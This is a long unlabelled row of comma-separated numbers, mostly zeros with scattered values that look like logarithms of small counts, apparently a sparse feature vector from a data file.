0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.518263445217986, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 3.1354942159291497, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.976014914136014, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 4.584967478670572, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 11.292366238736987, 5.723585101952381, 0.0, 5.346437018291705, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.189654742026425, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0.0, 1.9459101490553132, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 3.0910424533583156, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.310508262345584, 7.602458061243374, 1.6094379124341003, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 3.4965075614664802, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.9444389791664403, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0, 3.4825185607408002, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 4.59511985013459, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 5.375278407684164, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 4.795790545596741, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.58351893845611, 0, 0, 4.394449154672439, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 1.791759469228055, 2.1972245773362196, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.290459441148391, 0.0, 0, 0, 0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.772588722239781, 0.0, 0.0, 6.955874930725805, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 3.2188758248682006, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0, 0.0, 0.0, 0.0, 5.76977456331519, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.769774563315189, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.160336650881089, 0, 0.0, 0, 0, 0, 0.0, 4.825453896395787, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.174387269895637, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 3.713572066704308, 0.0, 0.0, 0, 1.3862943611198906, 0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 4.189654742026425, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 4.631631038266565, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 4.160336650881089, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.258096538021482, 0.0, 0.0, 4.189654742026425, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 